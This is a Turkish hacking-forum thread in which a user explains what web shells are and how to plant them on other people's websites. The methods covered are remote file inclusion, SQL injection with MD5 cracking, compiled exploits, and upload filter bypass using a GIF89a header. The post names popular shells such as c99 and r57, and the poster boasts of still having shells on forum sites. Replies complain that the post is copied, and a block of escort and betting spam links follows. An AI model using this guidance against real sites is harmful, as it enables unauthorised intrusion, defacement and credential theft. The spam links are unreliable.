Shell Nedir,Nasıl Kullanılır?

RageUnseen

Yeni Üye
Katılım
10 May 2016
Mesajlar
2
Tepkime puanı
0
Puanları
0
Shell Nedir? Nasıl Atılır? Neye Yarar?
Sorular. Maddeler. Başlıklar.
1) shell nedir?
2) shell Nasıl Atılır?
3) Kaç Tür shell Vardır?
Cevaplar.


1) shell nedir?


shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.
Permissionları Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. Permissionları Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.
Bir shelli En İyi Shelikde Kullanabilmek İçin shell Komutlarını İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.
Bir Çok Sunucuda Manuel Geçişlere İzin Verilmektedir. Spoll/Mail Kısmından Sunududaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.
Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki Config Dosyalarını Okuyarak SQL İle Bağlantı Sağlaya Biliriz.
shelli Ne İçin ve Hangi Aşamalarda Kullandığımızı Hacker Diliyle Anlattım Bir Diğer Maddeye Geçelim. Bu Maddemizde Anlamadığın veya Yeniden Anlatılmasını İstediğiniz Bir Yer Olursa Konu Aldında Belirtiniz.

2) shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz
1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı shell Yükleyebiliriz. veya Bağlandığımız .Txt shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.
Örnek:
http://www.siteadi.com/İndex.php?den...i.com/c99.txt?
İle Bağlandığımız Siteye .php Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.
http://www.siteadi.com/c99.php Şeklinde Kullanıma Geçebiliriz.


1.) RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.

2.) SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Cracker Yardımıyla Kırarız.
Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.
SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.

3.) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.
Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.

4.) Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli Resim Dosyası Olarak Görmesini Sağlarız.
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.
upload.php , upload.asp , upload.htm , upload.html
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.


Kaç Tür shell Vardır?


Genel Olarak Kullanılan 2, 3 Çeşit shell Vardır. Bunarın Uzantıları .php, .asp ve .aspx Dir. Şuanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalışma Mantığı Aynı.
Ençok Kullanılan sheller:
C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)

R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)
CyberSpy5.asp ( Genelde Kullandığım sheller Arasındadır.)
LORD.aspx ( Zaman Zaman Kullandığım Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI İçin Kullanılan shellerdir)

NOT: RFI de .asp shell veya .php shell Kullanılmaz.

.php Uzantılı sheller Unix, Linux, FreeBSD Sunucularında Kullanılır.
.asp Uzantılı sheller İse Windows Sunucularda Kullanılır.
Şimdi Siz Bir Linux Servere .asp Uzantılı shell Atamazsınız Atsanız Dahi Çalıştıramazsınız.

Ancak Windows Serverlere Nadirende Olsa Rastlamışımdır. .php Uzantılı sheller Atılabiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastladım. Yükleme ve Silme Yetkileri Bulunmamakta.
Bu Yüzden shell Yükleyeceğiniz Sitenin Sistemi İyi Bilmeniz Gerekiyor.
 

Blackwomen01

Yeni Üye
Katılım
8 May 2016
Mesajlar
183
Tepkime puanı
0
Puanları
0
hıde komutu ile gizli icerık yapalırısın .)
elıne sağlık
 

morena

Özel Üye
Katılım
8 Haz 2015
Mesajlar
465
Tepkime puanı
0
Puanları
0
Yaş
28
Web sitesi
mirror-h.org
bu konunun 1e1 aynısı tüm forumlarda var hemen hemen copy paste atmaman gerekirdi kuralları okumamış oldugun ortaya çıkıyor


''Dışarda çok benzeri olan sadece alından oluşan seri konular göndermek forumdan uzaklaştırılmanıza neden oalbilir . Konunuzu kendi üslubunuzla özgün olarak düzenleyiniz . Ajanlar.Org Özgün bir paylaşım forumudur''
 

Sid3s

Özel Üye
Katılım
13 Ara 2014
Mesajlar
1,567
Tepkime puanı
0
Puanları
0
Web sitesi
sid3sblog.wordpress.com
morena' Alıntı:
bu konunun 1e1 aynısı tüm forumlarda var hemen hemen copy paste atmaman gerekirdi kuralları okumamış oldugun ortaya çıkıyor


-'Dışarda çok benzeri olan sadece alından oluşan seri konular göndermek forumdan uzaklaştırılmanıza neden oalbilir . Konunuzu kendi üslubunuzla özgün olarak düzenleyiniz . Ajanlar.Org Özgün bir paylaşım forumudur'-

Aynen kank ,Bu şekil paylaşımlardan hiç kimse rütbe alamaz
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012